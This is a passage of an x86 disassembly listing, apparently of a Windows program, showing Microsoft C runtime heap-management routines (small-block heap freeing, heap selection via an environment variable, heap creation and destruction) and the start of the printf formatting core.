mov [ebp+var_24], eax
cmp [ebp+var_24], 3Fh
jbe short loc_42506E
mov [ebp+var_24], 3Fh
loc_42506E: ; CODE XREF: sub_424FD0+95�j
mov ecx, [ebp+var_38]
mov edx, [ebp+var_38]
mov eax, [ecx+4]
cmp eax, [edx+8]
jnz loc_425150
cmp [ebp+var_24], 20h
jnb short loc_4250E5
mov edx, 80000000h
mov ecx, [ebp+var_24]
shr edx, cl
not edx
mov eax, [ebp+var_4]
mov ecx, [ebp+var_3C]
mov eax, [ecx+eax*4+44h]
and eax, edx
mov ecx, [ebp+var_4]
mov edx, [ebp+var_3C]
mov [edx+ecx*4+44h], eax
mov eax, [ebp+var_3C]
add eax, [ebp+var_24]
mov cl, [eax+4]
sub cl, 1
mov edx, [ebp+var_3C]
add edx, [ebp+var_24]
mov [edx+4], cl
mov eax, [ebp+var_3C]
add eax, [ebp+var_24]
movsx ecx, byte ptr [eax+4]
test ecx, ecx
jnz short loc_4250E3
mov edx, 80000000h
mov ecx, [ebp+var_24]
shr edx, cl
not edx
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, edx
mov edx, [ebp+arg_0]
mov [edx], ecx
loc_4250E3: ; CODE XREF: sub_424FD0+F9�j
jmp short loc_425150
; ---------------------------------------------------------------------------
loc_4250E5: ; CODE XREF: sub_424FD0+B4�j
mov ecx, [ebp+var_24]
sub ecx, 20h
mov eax, 80000000h
shr eax, cl
not eax
mov ecx, [ebp+var_4]
mov edx, [ebp+var_3C]
mov ecx, [edx+ecx*4+0C4h]
and ecx, eax
mov edx, [ebp+var_4]
mov eax, [ebp+var_3C]
mov [eax+edx*4+0C4h], ecx
mov ecx, [ebp+var_3C]
add ecx, [ebp+var_24]
mov dl, [ecx+4]
sub dl, 1
mov eax, [ebp+var_3C]
add eax, [ebp+var_24]
mov [eax+4], dl
mov ecx, [ebp+var_3C]
add ecx, [ebp+var_24]
movsx edx, byte ptr [ecx+4]
test edx, edx
jnz short loc_425150
mov ecx, [ebp+var_24]
sub ecx, 20h
mov eax, 80000000h
shr eax, cl
not eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+4]
and edx, eax
mov eax, [ebp+arg_0]
mov [eax+4], edx
loc_425150: ; CODE XREF: sub_424FD0+AA�j
; sub_424FD0:loc_4250E3�j ...
mov ecx, [ebp+var_38]
mov edx, [ecx+8]
mov eax, [ebp+var_38]
mov ecx, [eax+4]
mov [edx+4], ecx
mov edx, [ebp+var_38]
mov eax, [edx+4]
mov ecx, [ebp+var_38]
mov edx, [ecx+8]
mov [eax+8], edx
mov eax, [ebp+var_30]
add eax, [ebp+var_14]
mov [ebp+var_30], eax
loc_425177: ; CODE XREF: sub_424FD0+7F�j
mov ecx, [ebp+var_30]
sar ecx, 4
sub ecx, 1
mov [ebp+var_28], ecx
cmp [ebp+var_28], 3Fh
jbe short loc_425190
mov [ebp+var_28], 3Fh
loc_425190: ; CODE XREF: sub_424FD0+1B7�j
mov edx, [ebp+var_C]
and edx, 1
test edx, edx
jnz loc_4252F4
mov eax, [ebp+var_1C]
sub eax, [ebp+var_C]
mov [ebp+var_34], eax
mov ecx, [ebp+var_C]
sar ecx, 4
sub ecx, 1
mov [ebp+var_2C], ecx
cmp [ebp+var_2C], 3Fh
jbe short loc_4251C0
mov [ebp+var_2C], 3Fh
loc_4251C0: ; CODE XREF: sub_424FD0+1E7�j
mov edx, [ebp+var_30]
add edx, [ebp+var_C]
mov [ebp+var_30], edx
mov eax, [ebp+var_30]
sar eax, 4
sub eax, 1
mov [ebp+var_28], eax
cmp [ebp+var_28], 3Fh
jbe short loc_4251E2
mov [ebp+var_28], 3Fh
loc_4251E2: ; CODE XREF: sub_424FD0+209�j
mov ecx, [ebp+var_2C]
cmp ecx, [ebp+var_28]
jz loc_4252EE
mov edx, [ebp+var_34]
mov eax, [ebp+var_34]
mov ecx, [edx+4]
cmp ecx, [eax+8]
jnz loc_4252D0
cmp [ebp+var_2C], 20h
jnb short loc_425265
mov edx, 80000000h
mov ecx, [ebp+var_2C]
shr edx, cl
not edx
mov eax, [ebp+var_4]
mov ecx, [ebp+var_3C]
mov eax, [ecx+eax*4+44h]
and eax, edx
mov ecx, [ebp+var_4]
mov edx, [ebp+var_3C]
mov [edx+ecx*4+44h], eax
mov eax, [ebp+var_3C]
add eax, [ebp+var_2C]
mov cl, [eax+4]
sub cl, 1
mov edx, [ebp+var_3C]
add edx, [ebp+var_2C]
mov [edx+4], cl
mov eax, [ebp+var_3C]
add eax, [ebp+var_2C]
movsx ecx, byte ptr [eax+4]
test ecx, ecx
jnz short loc_425263
mov edx, 80000000h
mov ecx, [ebp+var_2C]
shr edx, cl
not edx
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, edx
mov edx, [ebp+arg_0]
mov [edx], ecx
loc_425263: ; CODE XREF: sub_424FD0+279�j
jmp short loc_4252D0
; ---------------------------------------------------------------------------
loc_425265: ; CODE XREF: sub_424FD0+234�j
mov ecx, [ebp+var_2C]
sub ecx, 20h
mov eax, 80000000h
shr eax, cl
not eax
mov ecx, [ebp+var_4]
mov edx, [ebp+var_3C]
mov ecx, [edx+ecx*4+0C4h]
and ecx, eax
mov edx, [ebp+var_4]
mov eax, [ebp+var_3C]
mov [eax+edx*4+0C4h], ecx
mov ecx, [ebp+var_3C]
add ecx, [ebp+var_2C]
mov dl, [ecx+4]
sub dl, 1
mov eax, [ebp+var_3C]
add eax, [ebp+var_2C]
mov [eax+4], dl
mov ecx, [ebp+var_3C]
add ecx, [ebp+var_2C]
movsx edx, byte ptr [ecx+4]
test edx, edx
jnz short loc_4252D0
mov ecx, [ebp+var_2C]
sub ecx, 20h
mov eax, 80000000h
shr eax, cl
not eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+4]
and edx, eax
mov eax, [ebp+arg_0]
mov [eax+4], edx
loc_4252D0: ; CODE XREF: sub_424FD0+22A�j
; sub_424FD0:loc_425263�j ...
mov ecx, [ebp+var_34]
mov edx, [ecx+8]
mov eax, [ebp+var_34]
mov ecx, [eax+4]
mov [edx+4], ecx
mov edx, [ebp+var_34]
mov eax, [edx+4]
mov ecx, [ebp+var_34]
mov edx, [ecx+8]
mov [eax+8], edx
loc_4252EE: ; CODE XREF: sub_424FD0+218�j
mov eax, [ebp+var_34]
mov [ebp+var_1C], eax
loc_4252F4: ; CODE XREF: sub_424FD0+1C8�j
mov ecx, [ebp+var_C]
and ecx, 1
test ecx, ecx
jnz short loc_42530A
mov edx, [ebp+var_2C]
cmp edx, [ebp+var_28]
jz loc_42541A
loc_42530A: ; CODE XREF: sub_424FD0+32C�j
mov eax, [ebp+var_28]
mov ecx, [ebp+var_8]
lea edx, [ecx+eax*8]
mov [ebp+var_20], edx
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_20]
mov edx, [ecx+4]
mov [eax+4], edx
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_20]
mov [eax+8], ecx
mov edx, [ebp+var_20]
mov eax, [ebp+var_1C]
mov [edx+4], eax
mov ecx, [ebp+var_1C]
mov edx, [ecx+4]
mov eax, [ebp+var_1C]
mov [edx+8], eax
mov ecx, [ebp+var_1C]
mov edx, [ebp+var_1C]
mov eax, [ecx+4]
cmp eax, [edx+8]
jnz loc_42541A
cmp [ebp+var_28], 20h
jnb short loc_4253B3
mov ecx, [ebp+var_3C]
add ecx, [ebp+var_28]
movsx edx, byte ptr [ecx+4]
mov eax, [ebp+var_3C]
add eax, [ebp+var_28]
mov cl, [eax+4]
add cl, 1
mov eax, [ebp+var_3C]
add eax, [ebp+var_28]
mov [eax+4], cl
test edx, edx
jnz short loc_425391
mov edx, 80000000h
mov ecx, [ebp+var_28]
shr edx, cl
mov eax, [ebp+arg_0]
mov ecx, [eax]
or ecx, edx
mov edx, [ebp+arg_0]
mov [edx], ecx
loc_425391: ; CODE XREF: sub_424FD0+3A9�j
mov eax, 80000000h
mov ecx, [ebp+var_28]
shr eax, cl
mov ecx, [ebp+var_4]
mov edx, [ebp+var_3C]
mov ecx, [edx+ecx*4+44h]
or ecx, eax
mov edx, [ebp+var_4]
mov eax, [ebp+var_3C]
mov [eax+edx*4+44h], ecx
jmp short loc_42541A
; ---------------------------------------------------------------------------
loc_4253B3: ; CODE XREF: sub_424FD0+386�j
mov ecx, [ebp+var_3C]
add ecx, [ebp+var_28]
movsx edx, byte ptr [ecx+4]
mov eax, [ebp+var_3C]
add eax, [ebp+var_28]
mov cl, [eax+4]
add cl, 1
mov eax, [ebp+var_3C]
add eax, [ebp+var_28]
mov [eax+4], cl
test edx, edx
jnz short loc_4253F1
mov ecx, [ebp+var_28]
sub ecx, 20h
mov edx, 80000000h
shr edx, cl
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
or ecx, edx
mov edx, [ebp+arg_0]
mov [edx+4], ecx
loc_4253F1: ; CODE XREF: sub_424FD0+404�j
mov ecx, [ebp+var_28]
sub ecx, 20h
mov eax, 80000000h
shr eax, cl
mov ecx, [ebp+var_4]
mov edx, [ebp+var_3C]
mov ecx, [edx+ecx*4+0C4h]
or ecx, eax
mov edx, [ebp+var_4]
mov eax, [ebp+var_3C]
mov [eax+edx*4+0C4h], ecx
loc_42541A: ; CODE XREF: sub_424FD0+334�j
; sub_424FD0+37C�j ...
mov ecx, [ebp+var_1C]
mov edx, [ebp+var_30]
mov [ecx], edx
mov eax, [ebp+var_1C]
add eax, [ebp+var_30]
mov ecx, [ebp+var_30]
mov [eax-4], ecx
mov edx, [ebp+var_8]
mov eax, [edx]
sub eax, 1
mov ecx, [ebp+var_8]
mov [ecx], eax
mov edx, [ebp+var_8]
cmp dword ptr [edx], 0
jnz loc_4255A8
cmp Dst, 0
jz loc_425597
mov eax, dword_4F4E74
shl eax, 0Fh
mov ecx, Dst
mov edx, [ecx+0Ch]
add edx, eax
mov [ebp+var_18], edx
push 4000h
push 8000h
mov eax, [ebp+var_18]
push eax
call ds:dword_4F64E4 ; VirtualFree
mov edx, 80000000h
mov ecx, dword_4F4E74
shr edx, cl
mov eax, Dst
mov ecx, [eax+8]
or ecx, edx
mov edx, Dst
mov [edx+8], ecx
mov eax, Dst
mov ecx, [eax+10h]
mov edx, dword_4F4E74
mov dword ptr [ecx+edx*4+0C4h], 0
mov eax, Dst
mov ecx, [eax+10h]
mov dl, [ecx+43h]
sub dl, 1
mov eax, Dst
mov ecx, [eax+10h]
mov [ecx+43h], dl
mov edx, Dst
mov eax, [edx+10h]
movsx ecx, byte ptr [eax+43h]
test ecx, ecx
jnz short loc_4254F5
mov edx, Dst
mov eax, [edx+4]
and al, 0FEh
mov ecx, Dst
mov [ecx+4], eax
loc_4254F5: ; CODE XREF: sub_424FD0+50F�j
mov edx, Dst
cmp dword ptr [edx+8], 0FFFFFFFFh
jnz loc_425597
push 8000h
push 0
mov eax, Dst
mov ecx, [eax+0Ch]
push ecx
call ds:dword_4F64E4 ; VirtualFree
mov edx, Dst
mov eax, [edx+10h]
push eax
push 0
mov ecx, dword_4F4E68
push ecx
call ds:dword_4F6448 ; RtlFreeHeap
mov edx, dword_4F4E84
imul edx, 14h
mov eax, dword_4F4E88
add eax, edx
mov ecx, Dst
add ecx, 14h
sub eax, ecx
push eax ; Size
mov edx, Dst
add edx, 14h
push edx ; Src
mov eax, Dst
push eax ; Dst
call _memcpy_0
add esp, 0Ch
mov ecx, dword_4F4E84
sub ecx, 1
mov dword_4F4E84, ecx
mov edx, [ebp+arg_0]
cmp edx, Dst
jbe short loc_42558B
mov eax, [ebp+arg_0]
sub eax, 14h
mov [ebp+arg_0], eax
loc_42558B: ; CODE XREF: sub_424FD0+5B0�j
mov ecx, dword_4F4E88
mov dword_4F4E78, ecx
loc_425597: ; CODE XREF: sub_424FD0+47E�j
; sub_424FD0+52F�j
mov edx, [ebp+arg_0]
mov Dst, edx
mov eax, [ebp+var_4]
mov dword_4F4E74, eax
loc_4255A8: ; CODE XREF: sub_424FD0+58�j
; sub_424FD0+471�j
mov esp, ebp
pop ebp
retn
sub_424FD0 endp
; ---------------------------------------------------------------------------
align 10h
; [00000536 BYTES: COLLAPSED FUNCTION ___sbh_alloc_block. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000010F BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_region. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000001EE BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_group. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000005EB BYTES: COLLAPSED FUNCTION ___sbh_resize_block. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000130 BYTES: COLLAPSED FUNCTION ___sbh_heapmin. PRESS KEYPAD "+" TO EXPAND]
; [0000061D BYTES: COLLAPSED FUNCTION ___sbh_heap_check. PRESS KEYPAD "+" TO EXPAND]
align 10h
push ebp
mov ebp, esp
mov eax, dword_454DFC
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; [0000002B BYTES: COLLAPSED FUNCTION __set_sbh_threshold. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000001DE BYTES: COLLAPSED FUNCTION ___sbh_new_region. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000073 BYTES: COLLAPSED FUNCTION ___sbh_release_region. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000157 BYTES: COLLAPSED FUNCTION ___sbh_decommit_pages. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000090 BYTES: COLLAPSED FUNCTION ___sbh_find_block_0. PRESS KEYPAD "+" TO EXPAND]
; [0000006C BYTES: COLLAPSED FUNCTION ___sbh_free_block. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000003B8 BYTES: COLLAPSED FUNCTION ___sbh_alloc_block_0. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000002A9 BYTES: COLLAPSED FUNCTION ___sbh_alloc_block_from_page. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000164 BYTES: COLLAPSED FUNCTION ___sbh_resize_block_0. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000237 BYTES: COLLAPSED FUNCTION ___sbh_heap_check_0. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427A50 proc near ; CODE XREF: .text:00424E12�p
; sub_427AB0+1FB�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8
mov eax, [ebp+arg_0]
mov dword ptr [eax], 0
push 0
call ds:dword_4F63A4 ; GetModuleHandleA
mov [ebp+var_8], eax
mov ecx, [ebp+var_8]
xor edx, edx
mov dx, [ecx]
cmp edx, 5A4Dh
jnz short loc_427A83
mov eax, [ebp+var_8]
cmp dword ptr [eax+3Ch], 0
jnz short loc_427A85
loc_427A83: ; CODE XREF: sub_427A50+28�j
jmp short loc_427AA8
; ---------------------------------------------------------------------------
loc_427A85: ; CODE XREF: sub_427A50+31�j
mov ecx, [ebp+var_8]
mov edx, [ebp+var_8]
add edx, [ecx+3Ch]
mov [ebp+var_4], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_4]
mov dl, [ecx+1Ah]
mov [eax], dl
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_4]
mov dl, [ecx+1Bh]
mov [eax+1], dl
loc_427AA8: ; CODE XREF: sub_427A50:loc_427A83�j
mov esp, ebp
pop ebp
retn
sub_427A50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427AB0 proc near ; CODE XREF: sub_427CE0:loc_427D0C�p
Str = dword ptr -1238h
var_1234 = dword ptr -1234h
var_1230 = dword ptr -1230h
SubStr = byte ptr -122Ch
Str2 = byte ptr -1128h
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_88 = dword ptr -88h
var_4 = dword ptr -4
push ebp
mov ebp, esp
mov eax, 1238h
call __alloca_probe
mov [ebp+Str], 0
mov [ebp+var_98], 94h
lea eax, [ebp+var_98]
push eax
call ds:dword_4F63D0 ; GetVersionExA
test eax, eax
jz short loc_427AFE
cmp [ebp+var_88], 2
jnz short loc_427AFE
cmp [ebp+var_94], 5
jb short loc_427AFE
mov eax, 1
jmp loc_427CD0
; ---------------------------------------------------------------------------
loc_427AFE: ; CODE XREF: sub_427AB0+30�j
; sub_427AB0+39�j ...
push 1090h
lea ecx, [ebp+Str2]
push ecx
push offset a__msvcrt_heap_ ; "__MSVCRT_HEAP_SELECT"
call ds:dword_4F64EC ; GetEnvironmentVariableA
test eax, eax
jz loc_427CA4
lea edx, [ebp+Str2]
mov [ebp+var_4], edx
jmp short loc_427B31
; ---------------------------------------------------------------------------
loc_427B28: ; CODE XREF: sub_427AB0:loc_427B5E�j
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
loc_427B31: ; CODE XREF: sub_427AB0+76�j
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
test edx, edx
jz short loc_427B60
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
cmp ecx, 61h
jl short loc_427B5E
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
cmp eax, 7Ah
jg short loc_427B5E
mov ecx, [ebp+var_4]
mov dl, [ecx]
add dl, 0E0h
mov eax, [ebp+var_4]
mov [eax], dl
loc_427B5E: ; CODE XREF: sub_427AB0+94�j
; sub_427AB0+9F�j
jmp short loc_427B28
; ---------------------------------------------------------------------------
loc_427B60: ; CODE XREF: sub_427AB0+89�j
push 16h ; MaxCount
lea ecx, [ebp+Str2]
push ecx ; Str2
push offset Str1 ; "__GLOBAL_HEAP_SELECTED"
call _strncmp
add esp, 0Ch
test eax, eax
jnz short loc_427B88
lea edx, [ebp+Str2]
mov [ebp+Str], edx
jmp short loc_427BFB
; ---------------------------------------------------------------------------
loc_427B88: ; CODE XREF: sub_427AB0+C8�j
push 104h
lea eax, [ebp+SubStr]
push eax
push 0
call ds:dword_4F6378 ; GetModuleFileNameA
lea ecx, [ebp+SubStr]
mov [ebp+var_4], ecx
jmp short loc_427BB0
; ---------------------------------------------------------------------------
loc_427BA7: ; CODE XREF: sub_427AB0:loc_427BDD�j
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
loc_427BB0: ; CODE XREF: sub_427AB0+F5�j
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
test ecx, ecx
jz short loc_427BDF
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
cmp eax, 61h
jl short loc_427BDD
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
cmp edx, 7Ah
jg short loc_427BDD
mov eax, [ebp+var_4]
mov cl, [eax]
add cl, 0E0h
mov edx, [ebp+var_4]
mov [edx], cl
loc_427BDD: ; CODE XREF: sub_427AB0+113�j
; sub_427AB0+11E�j
jmp short loc_427BA7
; ---------------------------------------------------------------------------
loc_427BDF: ; CODE XREF: sub_427AB0+108�j
lea eax, [ebp+SubStr]
push eax ; SubStr
lea ecx, [ebp+Str2]
push ecx ; Str
call _strstr
add esp, 8
mov [ebp+Str], eax
loc_427BFB: ; CODE XREF: sub_427AB0+D6�j
cmp [ebp+Str], 0
jz loc_427CA4
push 2Ch ; Val
mov edx, [ebp+Str]
push edx ; Str
call _strchr
add esp, 8
mov [ebp+Str], eax
cmp [ebp+Str], 0
jz short loc_427CA4
mov eax, [ebp+Str]
add eax, 1
mov [ebp+Str], eax
mov ecx, [ebp+Str]
mov [ebp+var_4], ecx
loc_427C40: ; CODE XREF: sub_427AB0:loc_427C66�j
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
test eax, eax
jz short loc_427C68
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
cmp edx, 3Bh
jnz short loc_427C5D
mov eax, [ebp+var_4]
mov byte ptr [eax], 0
jmp short loc_427C66
; ---------------------------------------------------------------------------
loc_427C5D: ; CODE XREF: sub_427AB0+1A3�j
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
loc_427C66: ; CODE XREF: sub_427AB0+1AB�j
jmp short loc_427C40
; ---------------------------------------------------------------------------
loc_427C68: ; CODE XREF: sub_427AB0+198�j
push 0Ah ; Radix
push 0 ; EndPtr
mov edx, [ebp+Str]
push edx ; Str
call _strtol
add esp, 0Ch
mov [ebp+var_1230], eax
cmp [ebp+var_1230], 2
jz short loc_427C9C
cmp [ebp+var_1230], 3
jz short loc_427C9C
cmp [ebp+var_1230], 1
jnz short loc_427CA4
loc_427C9C: ; CODE XREF: sub_427AB0+1D8�j
; sub_427AB0+1E1�j
mov eax, [ebp+var_1230]
jmp short loc_427CD0
; ---------------------------------------------------------------------------
loc_427CA4: ; CODE XREF: sub_427AB0+67�j
; sub_427AB0+152�j ...
lea eax, [ebp+var_1234]
push eax
call sub_427A50
add esp, 4
mov ecx, [ebp+var_1234]
and ecx, 0FFh
cmp ecx, 6
jl short loc_427CCB
mov eax, 3
jmp short loc_427CD0
; ---------------------------------------------------------------------------
loc_427CCB: ; CODE XREF: sub_427AB0+212�j
mov eax, 2
loc_427CD0: ; CODE XREF: sub_427AB0+49�j
; sub_427AB0+1F2�j ...
mov esp, ebp
pop ebp
retn
sub_427AB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427CE0 proc near ; CODE XREF: start+7E�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0
push 1000h
xor eax, eax
cmp [ebp+arg_0], 0
setz al
push eax
call ds:dword_4F64F4 ; HeapCreate
mov dword_4F4E68, eax
cmp dword_4F4E68, 0
jnz short loc_427D0C
xor eax, eax
jmp short loc_427D6B
; ---------------------------------------------------------------------------
loc_427D0C: ; CODE XREF: sub_427CE0+26�j
call sub_427AB0
mov dword_4F4E6C, eax
cmp dword_4F4E6C, 3
jnz short loc_427D43
push 3F8h
call ___sbh_heap_init
add esp, 4
test eax, eax
jnz short loc_427D41
mov ecx, dword_4F4E68
push ecx
call ds:dword_4F64F0 ; HeapDestroy
xor eax, eax
jmp short loc_427D6B
; ---------------------------------------------------------------------------
loc_427D41: ; CODE XREF: sub_427CE0+4E�j
jmp short loc_427D66
; ---------------------------------------------------------------------------
loc_427D43: ; CODE XREF: sub_427CE0+3D�j
cmp dword_4F4E6C, 2
jnz short loc_427D66
call ___sbh_new_region
test eax, eax
jnz short loc_427D66
mov edx, dword_4F4E68
push edx
call ds:dword_4F64F0 ; HeapDestroy
xor eax, eax
jmp short loc_427D6B
; ---------------------------------------------------------------------------
loc_427D66: ; CODE XREF: sub_427CE0:loc_427D41�j
; sub_427CE0+6A�j ...
mov eax, 1
loc_427D6B: ; CODE XREF: sub_427CE0+2A�j
; sub_427CE0+5F�j ...
pop ebp
retn
sub_427CE0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
sub esp, 0Ch
cmp dword_4F4E6C, 3
jnz loc_427E0A
mov eax, dword_4F4E88
mov [ebp-8], eax
mov dword ptr [ebp-4], 0
jmp short loc_427D9D
; ---------------------------------------------------------------------------
loc_427D94: ; CODE XREF: .text:00427DF1�j
mov ecx, [ebp-4]
add ecx, 1
mov [ebp-4], ecx
loc_427D9D: ; CODE XREF: .text:00427D92�j
mov edx, [ebp-4]
cmp edx, dword_4F4E84
jge short loc_427DF3
push 4000h
push 100000h
mov eax, [ebp-8]
mov ecx, [eax+0Ch]
push ecx
call ds:dword_4F64E4 ; VirtualFree
push 8000h
push 0
mov edx, [ebp-8]
mov eax, [edx+0Ch]
push eax
call ds:dword_4F64E4 ; VirtualFree
mov ecx, [ebp-8]
mov edx, [ecx+10h]
push edx
push 0
mov eax, dword_4F4E68
push eax
call ds:dword_4F6448 ; RtlFreeHeap
mov ecx, [ebp-8]
add ecx, 14h
mov [ebp-8], ecx
jmp short loc_427D94
; ---------------------------------------------------------------------------
loc_427DF3: ; CODE XREF: .text:00427DA6�j
mov edx, dword_4F4E88
push edx
push 0
mov eax, dword_4F4E68
push eax
call ds:dword_4F6448 ; RtlFreeHeap
jmp short loc_427E48
; ---------------------------------------------------------------------------
loc_427E0A: ; CODE XREF: .text:00427D7D�j
cmp dword_4F4E6C, 2
jnz short loc_427E48
mov dword ptr [ebp-0Ch], offset off_452DD8
loc_427E1A: ; CODE XREF: .text:00427E46�j
mov ecx, [ebp-0Ch]
cmp dword ptr [ecx+10h], 0
jz short loc_427E37
push 8000h
push 0
mov edx, [ebp-0Ch]
mov eax, [edx+10h]
push eax
call ds:dword_4F64E4 ; VirtualFree
loc_427E37: ; CODE XREF: .text:00427E21�j
mov ecx, [ebp-0Ch]
mov edx, [ecx]
mov [ebp-0Ch], edx
cmp dword ptr [ebp-0Ch], offset off_452DD8
jnz short loc_427E1A
loc_427E48: ; CODE XREF: .text:00427E08�j
; .text:00427E11�j
mov eax, dword_4F4E68
push eax
call ds:dword_4F64F0 ; HeapDestroy
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; [000000B7 BYTES: COLLAPSED FUNCTION __isctype. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000001E4 BYTES: COLLAPSED FUNCTION __filbuf. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000082 BYTES: COLLAPSED FUNCTION __read. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000445 BYTES: COLLAPSED FUNCTION __read_lk. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000031D BYTES: COLLAPSED FUNCTION __openfile. PRESS KEYPAD "+" TO EXPAND]
off_42890D dd offset loc_42873B ; DATA XREF: __openfile+144�r
dd offset loc_428866
dd offset loc_428825
dd offset loc_428804
dd offset loc_428846
dd offset loc_428775
dd offset loc_4287BC
dd offset loc_4287E0
dd offset loc_428799
dd offset loc_428883
byte_428935 db 0 ; DATA XREF: __openfile+13E�r
dw 909h
dd 5 dup(9090909h), 9010909h, 3 dup(9090909h), 9040302h
dd 3 dup(9090909h), 9090605h, 2 dup(9090909h), 9090907h
dd 0CC080909h
; [00000180 BYTES: COLLAPSED FUNCTION __getstream. PRESS KEYPAD "+" TO EXPAND]
; [00000274 BYTES: COLLAPSED FUNCTION __flsbuf. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_428D80(FILE *File,int,int)
sub_428D80 proc near ; CODE XREF: _sprintf+9A�p
; __snprintf+99�p ...
var_2AA = word ptr -2AAh
var_2A8 = dword ptr -2A8h
var_2A4 = dword ptr -2A4h
var_2A0 = dword ptr -2A0h
var_29C = dword ptr -29Ch
var_298 = dword ptr -298h
var_294 = dword ptr -294h
var_290 = dword ptr -290h
var_28C = dword ptr -28Ch
var_288 = dword ptr -288h
var_284 = dword ptr -284h
var_280 = dword ptr -280h
var_27C = dword ptr -27Ch
var_278 = dword ptr -278h
var_274 = dword ptr -274h
var_270 = dword ptr -270h
var_26C = dword ptr -26Ch
var_268 = dword ptr -268h
var_264 = dword ptr -264h
var_260 = dword ptr -260h
var_25C = dword ptr -25Ch
var_258 = dword ptr -258h
var_254 = dword ptr -254h
var_250 = dword ptr -250h
var_24C = word ptr -24Ch
var_248 = dword ptr -248h
var_244 = dword ptr -244h
var_240 = dword ptr -240h
var_23C = dword ptr -23Ch
Size = dword ptr -238h
var_234 = dword ptr -234h
var_230 = dword ptr -230h
MbCh = byte ptr -22Ch
var_2D = byte ptr -2Dh
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
Str = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
WCh = word ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
File = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 2ACh
push ebx
push esi
push edi
mov [ebp+var_28], 0
mov [ebp+var_230], 0
mov [ebp+var_1C], 0
mov [ebp+var_C], 0
loc_428DAB: ; CODE XREF: sub_428D80:loc_429A29�j
mov eax, [ebp+arg_4]
mov cl, [eax]
mov byte ptr [ebp+var_2C], cl
movsx edx, byte ptr [ebp+var_2C]
mov eax, [ebp+arg_4]
add eax, 1
mov [ebp+arg_4], eax
test edx, edx
jz loc_429A2E
cmp [ebp+var_230], 0
jl loc_429A2E
movsx ecx, byte ptr [ebp+var_2C]
cmp ecx, 20h
jl short loc_428DFD
movsx edx, byte ptr [ebp+var_2C]
cmp edx, 78h
jg short loc_428DFD
movsx eax, byte ptr [ebp+var_2C]
movsx ecx, byte ptr ds:(aInconsistentIo+2Ch)[eax]
and ecx, 0Fh
mov [ebp+var_294], ecx
jmp short loc_428E07
; ---------------------------------------------------------------------------
loc_428DFD: ; CODE XREF: sub_428D80+5C�j
; sub_428D80+65�j
mov [ebp+var_294], 0
loc_428E07: ; CODE XREF: sub_428D80+7B�j
mov edx, [ebp+var_294]
mov [ebp+var_10], edx
mov eax, [ebp+var_10]
mov ecx, [ebp+var_1C]
movsx edx, ds:byte_43E168[ecx+eax*8]
sar edx, 4
mov [ebp+var_1C], edx
mov eax, [ebp+var_1C]
mov [ebp+var_298], eax
cmp [ebp+var_298], 7
ja loc_429A29
mov ecx, [ebp+var_298]
jmp ds:off_429A3B[ecx*4]
loc_428E47: ; CODE XREF: sub_428D80+339�j
; DATA XREF: .text:off_429A3B�o
mov [ebp+var_20], 0
mov edx, [ebp+var_2C]
and edx, 0FFh
mov eax, off_454E04
xor ecx, ecx
mov cx, [eax+edx*2]
and ecx, 8000h
test ecx, ecx
jz short loc_428EC4
lea edx, [ebp+var_230]
push edx ; int
mov eax, [ebp+File]
push eax ; File
